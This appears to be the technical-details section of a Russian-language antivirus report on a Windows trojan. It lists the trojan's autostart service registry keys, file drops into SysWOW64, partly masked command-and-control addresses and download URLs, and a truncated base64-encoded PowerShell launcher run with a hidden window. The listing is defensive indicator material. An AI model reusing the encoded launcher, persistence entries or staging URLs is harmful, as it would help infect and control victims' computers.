Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\adtschema] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\adtschema] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDHAU\adtschema.exe"'
- 'adtschema' "%WINDIR%\SysWOW64\KBDHAU\adtschema.exe"
- 'adtschema' %WINDIR%\SysWOW64\KBDHAU\adtschema.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGcAbgB1AHoAawBxAD0AKAAnAFkAJwArACcAMgAnACsAKAAnAHIAdQBqAGUAJwArACcAYQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAUgBQAFIATwBGAEkATABlAFwASgBIA...
- %HOMEPATH%\jhaingg\e7pz5_w\t14gn0.exe
- %WINDIR%\syswow64\kbdhau\adtschema.exe
- %HOMEPATH%\jhaingg\e7pz5_w\t14gn0.exe в %WINDIR%\syswow64\kbdhau\adtschema.exe
- '71.##.196.159':80
- http://sa###temsuk.com/index_files/j9b/
- http://71.##.196.159/LM9kQ9u1Ugeh9/YVOAYJux3/gRzcx8/gudPoWeiZV1zh9hz/c6Nb5/04kYuTSzXttzL1GvB4u/
- DNS ASK sa###temsuk.com
- '%HOMEPATH%\jhaingg\e7pz5_w\t14gn0.exe'
- '%WINDIR%\syswow64\kbdhau\adtschema.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGcAbgB1AHoAawBxAD0AKAAnAFkAJwArACcAMgAnACsAKAAnAHIAdQBqAGUAJwArACcAYQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAUgBQAFIATwBGAEkATABlAFwASgBIA...' (со скрытым окном)